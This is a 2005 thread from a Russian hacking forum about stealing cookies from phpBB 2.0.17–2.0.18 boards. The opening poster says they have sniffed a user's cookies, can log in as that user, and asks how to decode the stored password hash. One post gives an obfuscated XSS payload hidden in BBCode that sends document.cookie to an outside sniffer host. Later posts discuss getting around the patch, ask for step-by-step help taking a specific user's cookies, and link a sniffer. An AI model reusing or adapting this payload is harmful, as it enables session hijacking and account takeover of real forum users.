HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Куки в phpbb 2.0.17 - 2.0.18
  #1  
Старый 14.11.2005, 02:50
Manoz
Познающий
Регистрация: 15.02.2005
Сообщений: 39
С нами: 11175364

Репутация: 7
По умолчанию Куки в phpbb 2.0.17 - 2.0.18

Отснифал кукисы, могу зайти под юзером, но есть ли возможность расшифровать пароль?

a:2:{s:11:"autologinid";s:33:"15947019324377939477 62e4.02269531";s:6:"userid";i:1161;}

1594701932437793947762e4.02269531 - Это какой алгоритм шифрования,

Спасибо за помощь!
 
Ответить с цитированием

  #2  
Старый 14.11.2005, 07:15
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами: 10946149

Репутация: 116


По умолчанию

 
Ответить с цитированием

  #3  
Старый 14.11.2005, 11:14
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
С нами: 10834946

Репутация: 74
По умолчанию

спасибо мне тоже это надо было =)
 
Ответить с цитированием

  #4  
Старый 14.11.2005, 14:25
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

Да если не трудно, поставь весь код.
 
Ответить с цитированием

  #5  
Старый 14.11.2005, 15:23
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?
 
Ответить с цитированием

  #6  
Старый 14.11.2005, 15:25
Polisos
Новичок
Регистрация: 12.11.2005
Сообщений: 16
С нами: 10786700

Репутация: -5
По умолчанию

Цитата:
Сообщение от Tem  
Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?
Ну давай. Теги вообще на форуме работают та? Я и сам уберал, там всё работает значит ты что то не даубрал. Покажи что и как делаешь.
 
Ответить с цитированием

  #7  
Старый 18.11.2005, 17:20
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
С нами: 10782887

Репутация: 43
По умолчанию

Цитата:
Сообщение от Tem  
Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?
Преобразование идет из-за заплатки. Она стоит почти на всех 2.0.18 Но если код слегка подправить, он отлично работает. Заплатка отдыхает. Я подправил, у меня заработал код алерта на 2.0.18 и второй код пашет вроде.
Но у меня ламерский вопрос, на который очень прошу кого-нибудь ответить. Как при помощи этого кода воровать куки? Можно пошагово? Куда они прописываются? В этом коде надо что-то менять? Как взять куки конкретного юзера? (Я говорю о коде для phpbb 2.0.18 которые выше Polisos дал).

Последний раз редактировалось syntacsis; 18.11.2005 в 17:25..
 
Ответить с цитированием

  #8  
Старый 14.11.2005, 15:57
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
Я убераю все плюсики, но всё равно не пашет.

Последний раз редактировалось Tem; 14.11.2005 в 16:02..
 
Ответить с цитированием

  #9  
Старый 14.11.2005, 15:58
Polisos
Новичок
Регистрация: 12.11.2005
Сообщений: 16
С нами: 10786700

Репутация: -5
По умолчанию

в html теги засунь.

Нет, результат в html засунь Я ведь не вижу если просто запостишь они просто на форуме сработают!

Покажи результат что ты делаешь, и засунь это всё так же в теги на античатовском форуме.

Работает только в ИЕ не забывай этого.

Последний раз редактировалось Polisos; 14.11.2005 в 16:31..
 
Ответить с цитированием

  #10  
Старый 18.11.2005, 19:15
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами: 10798886

Репутация: 523


По умолчанию

вот один из множества доступных снифферов. http://antichat.ru/sniff/
там всё написано....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet. queen Уязвимости 26 05.01.2006 06:29
Проникаем в phpBB 2.0.17 kitiaCaT Уязвимости CMS / форумов 5 18.10.2005 23:37
Уязвимость в phpBB 2.0.17 PEPSICOLA Уязвимости CMS / форумов 13 28.09.2005 20:26



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...